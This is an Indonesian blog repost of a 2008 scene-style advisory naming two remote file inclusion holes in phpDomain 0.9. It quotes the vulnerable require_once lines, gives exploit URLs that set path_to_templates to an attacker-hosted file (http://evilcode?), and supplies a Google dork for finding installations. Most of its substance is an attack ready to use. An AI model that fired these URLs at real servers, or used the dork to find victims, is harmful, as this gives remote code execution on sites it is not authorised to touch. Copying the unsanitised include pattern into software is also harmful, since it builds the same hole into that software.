[+] judul : phpDomain v. 0.9 Multiple RFI Vulnerabilities
[+] author : S4M3K
[+] situs : http://m3kszone.co.uk
[+] waktu : 10-07-2008
[+] hits : 199
_________________________________________________________________________
| |
|*** phpDomain v. 0.9 Multiple Remote File Include Vulnerabilities *** |
|________________________________________________________________________|
_________________________Bug Found By :_________________________
________________________________________________________________
____________________ ____________________ ___ /
| _______/ | / \_____ /\_ |/ / /
\_____ / /| | | | ____( | / /
/ / /_| | | | | /
/|____ | _/_ / \____ / | / / /
/ / / / / / / /
\__________________________________________________/
\________________S4M3K_@07-2008_______________/
_________________________Download link :__________________________
_________________________________________________________________
/
http://www.phpdomain.net/ /
\___________________________________________________________/
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ contact: x_spy@mac.com +
+ +
+ Home : http://m3kszone.co.uk/adv/m3ks-adv-07-2008.htm +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
_______________________Vuln Code In File :_______________________
_________________________________________________________________
\ /
\ "openSRS_base.php" in line... /
\ ( /classes/ ) /
+++\ /+++
+ +
+ + /===========> +
+ require_once $path_to_templates . '/classes/PEAR.php'; +
+ require_once $path_to_templates . '/classes/CBC.php'; +
+ /===========> +
+++/ ?> \+++
/ \
/ \
/_______________________________________________________________\
_______________________Vuln Code In File :_______________________
_________________________________________________________________
\ /
\ "OPS.php" in line... /
\ ( /classes/ ) /
+++\ /+++
+ + /===========> +
+ +
+ require_once $path_to_templates . '/classes/PEAR.php'; +
+ +
+ /===========> +
+++/ ?> \+++
/ \
/ \
/_______________________________________________________________\
_______________________Vuln Code In File :_______________________
_________________________Greetz To :______________________________
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Scr3W_W0rM, Nyubi, Home_edition2001, Dj-RuFfy, TOMMY_PENGAMEN, +
+ th0nk, iFX, Cookie, VanDaMe, Dead & +
+ All member on #nyubicrew @irc.mildnet.org +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
_________________________Exploit :________________________________
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ http://[path]/classes/openSRS_base.php?path_to_templates=http://evilcode?+
+ http://[path]/classes/OPS.php?path_to_templates=http://evilcode? +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
_________________________g00gLe d0Rk :_____________________________
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ /phpDomain/ +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++
Jumat, 05 Februari 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar